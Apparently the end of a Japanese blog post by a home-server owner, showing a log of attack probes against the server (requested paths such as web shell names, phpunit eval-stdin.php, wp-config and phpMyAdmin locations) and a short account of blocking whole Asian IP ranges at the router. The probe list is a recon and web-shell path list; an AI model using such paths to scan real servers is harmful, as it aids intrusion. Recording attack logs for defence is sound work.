/weaver/bsh.servlet.BshServlet: 1 Time(s)
/web.php: 1 Time(s)
/web/phpMyAdmin/index.php: 1 Time(s)
/webconfig.php: 1 Time(s)
/webconfig.txt.php: 1 Time(s)
/webdav/: 1 Time(s)
/webslee.php: 1 Time(s)
/websql/index.php: 1 Time(s)
/weixiao.php: 1 Time(s)
/whoami.php: 1 Time(s)
/whoami.php.php: 1 Time(s)
/win.php: 1 Time(s)
/win1.php: 1 Time(s)
/woshimengmei.php: 1 Time(s)
/wp-admins.php: 1 Time(s)
/wp-content/plugins/cloudflare/vendor/phpu … /eval-stdin.php: 1 Time(s)
/wp-content/plugins/dzs-videogallery/class … /eval-stdin.php: 1 Time(s)
/wp-content/plugins/jekyll-exporter/vendor … /eval-stdin.php: 1 Time(s)
/wp-content/plugins/mm-plugin/inc/vendors/ … /eval-stdin.php: 1 Time(s)
/wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php: 1 Time(s)
/wp-includes/css/modules.php: 1 Time(s)
/wp-includes/css/wp-config.php: 1 Time(s)
/wp-includes/css/wp-login.php: 1 Time(s)
/wp-includes/fonts/modules.php: 1 Time(s)
/wp-includes/fonts/wp-config.php: 1 Time(s)
/wp-includes/fonts/wp-login.php: 1 Time(s)
/wp-includes/modules/modules.php: 1 Time(s)
/wp-includes/modules/wp-config.php: 1 Time(s)
/wp-includes/modules/wp-login.php: 1 Time(s)
/wp-json/oembed/1.0/embed?url=http://deeps … 1.netvolante.jp: 1 Time(s)
/wp-json/wp/v2/users/: 1 Time(s)
/wpc.php: 1 Time(s)
/wpo.php: 1 Time(s)
/wshell.php: 1 Time(s)
/wsx.php: 1 Time(s)
/wulv.php: 1 Time(s)
/wuwu.php: 1 Time(s)
/wuwu11.php: 1 Time(s)
/www/phpMyAdmin/index.php: 1 Time(s)
/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 1 Time(s)
/xampp/phpmyadmin/index.php: 1 Time(s)
/xh.php: 1 Time(s)
/xi.php: 1 Time(s)
/xiaobin.php: 1 Time(s)
/xiaodai.php: 1 Time(s)
/xiaohei.php: 1 Time(s)
/xiaoma.php: 1 Time(s)
/xiaomae.php: 1 Time(s)
/xiaomar.php: 1 Time(s)
/xiaomi.php: 1 Time(s)
/xiaomo.php: 1 Time(s)
/xiaoxia.php: 1 Time(s)
/xiaoyu.php: 1 Time(s)
/xiaxia.php: 1 Time(s)
/xing.php: 1 Time(s)
/xiong.php: 1 Time(s)
/xiu.php: 1 Time(s)
/xixi.php: 1 Time(s)
/xp.php: 1 Time(s)
/xs.php: 1 Time(s)
/xshell.php: 1 Time(s)
/xsser.php: 1 Time(s)
/xun.php: 1 Time(s)
/xw.php: 1 Time(s)
/xw1.php: 1 Time(s)
/xx33.php: 1 Time(s)
/xxx.php: 1 Time(s)
/xxxx.php: 1 Time(s)
/xz.php: 1 Time(s)
/yao.php: 1 Time(s)
/yc.php: 1 Time(s)
/ycc.php: 1 Time(s)
/yccc.php: 1 Time(s)
/yj.php: 1 Time(s)
/ysy.php: 1 Time(s)
/yu.php: 1 Time(s)
/yumo.php: 1 Time(s)
/yuyang.php: 1 Time(s)
/yyx.php: 1 Time(s)
/yyy.php: 1 Time(s)
/ze.php: 1 Time(s)
/zhk.php: 1 Time(s)
/zhui.php: 1 Time(s)
/zmp.php: 1 Time(s)
/zshmindex.php: 1 Time(s)
/zuo.php: 1 Time(s)
/zuoindex.php: 1 Time(s)
/zuos.php: 1 Time(s)
/zuoshou.php: 1 Time(s)
/zuoshss.php: 1 Time(s)
/zuoss.php: 1 Time(s)
/zxc0.php: 1 Time(s)
/zxc2.php: 1 Time(s)
/zyc.php: 1 Time(s)
/zz.php: 1 Time(s)
/zza.php: 1 Time(s)
/zzk.php: 1 Time(s)%MCEPASTEBIN%
以上のような戦いの教訓からヴォーラ!、我を除くアジアン系全部BANしてやろうじゃね~か!
今回、ハッキングに対して臨時に行ったのはルータの内側(ファイヤーウォール内側)のサーバでの対策なので、ルータそのものに鎖国フィルターを適用してポートスキャンそのものを出来ないようにします。
鎖国フィルターとは、このホームページに載っている手法です。
簡単に言うと国ごと(アジアン)のIPを全てブロックしてしまうフィルタです。
上記、鎖国フィルタですが、luaで行っても「静的フィルター」から「適用フィルター」へ適用されないため動作しません。そのため違う手法で実現しました。
現在は、リアルタムで不正アクセス者のIPを調査後、ルータへブロックリストが反映されます。